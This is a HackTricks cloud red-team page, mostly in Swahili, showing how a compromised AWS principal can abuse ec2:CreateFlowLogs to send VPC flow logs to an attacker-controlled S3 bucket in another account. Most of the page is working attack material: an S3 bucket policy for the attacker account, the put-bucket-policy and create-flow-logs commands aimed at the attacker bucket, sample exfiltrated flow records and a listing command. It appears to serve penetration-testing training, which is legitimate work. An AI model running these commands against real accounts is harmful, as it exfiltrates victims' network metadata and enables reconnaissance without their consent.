AWS - VPC Flow Logs Cross-Account Exfiltration to S3

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Muhtasari

Tumia vibaya ec2:CreateFlowLogs kuhamisha VPC, subnet, au ENI flow logs moja kwa moja kwenye bucket ya S3 inayodhibitiwa na mshambuliaji. Mara delivery role itakapowekwa kuandika kwenye bucket ya nje, kila muunganisho unaoonekana kwenye rasilimali inayofuatiliwa hupelekwa nje ya akaunti ya mwathiriwa.

Mahitaji

  • Principal wa mwathiriwa: ec2:CreateFlowLogs, ec2:DescribeFlowLogs, na iam:PassRole (ikiwa delivery role inahitajika/imetengenezwa).
  • Attacker bucket: sera ya S3 inayomwamini delivery.logs.amazonaws.com na s3:PutObject na bucket-owner-full-control.
  • Hiari: logs:DescribeLogGroups ikiwa una-export kwenda CloudWatch badala ya S3 (haina haja hapa).

Hatua za Shambulio

  1. Attacker huandaa sera ya bucket ya S3 (katika akaunti ya attacker) inayoruhusu huduma ya VPC Flow Logs delivery kuandika vitu. Badilisha placeholders kabla ya kutekeleza:
json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowVPCFlowLogsDelivery",
"Effect": "Allow",
"Principal": { "Service": "delivery.logs.amazonaws.com" },
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
"Condition": {
"StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
}
}
]
}

Tekeleza kutoka kwenye attacker account:

bash
aws s3api put-bucket-policy \
--bucket <attacker-bucket> \
--policy file://flowlogs-policy.json
  1. Victim (compromised principal) anaunda flow logs zikilenga attacker bucket:
bash
REGION=us-east-1
VPC_ID=<vpc-xxxxxxxx>
ROLE_ARN=<delivery-role-with-logs-permissions>   # Must allow delivery.logs.amazonaws.com to assume it
aws ec2 create-flow-logs \
--resource-type VPC \
--resource-ids "$VPC_ID" \
--traffic-type ALL \
--log-destination-type s3 \
--log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
--deliver-logs-permission-arn "$ROLE_ARN" \
--region "$REGION"

Ndani ya dakika chache, flow log files zinaonekana katika attacker bucket zikionyesha connections za ENIs zote katika VPC/subnet iliyofuatiliwa.

Ushahidi

Mifano ya rekodi za flow log zilizoandikwa kwenye attacker bucket:

text
version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK

Ushahidi wa Bucket listing:

bash
aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summarize

Impact

  • Exfiltration ya metadata ya mtandao inayoendelea (source/destination IPs, ports, protocols) kwa VPC/subnet/ENI iliyofuatiliwa.
  • Inaruhusu uchambuzi wa trafiki, utambuzi wa huduma nyeti, na uwezekano wa kutafuta security group misconfigurations kutoka nje ya akaunti ya mwathiriwa.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks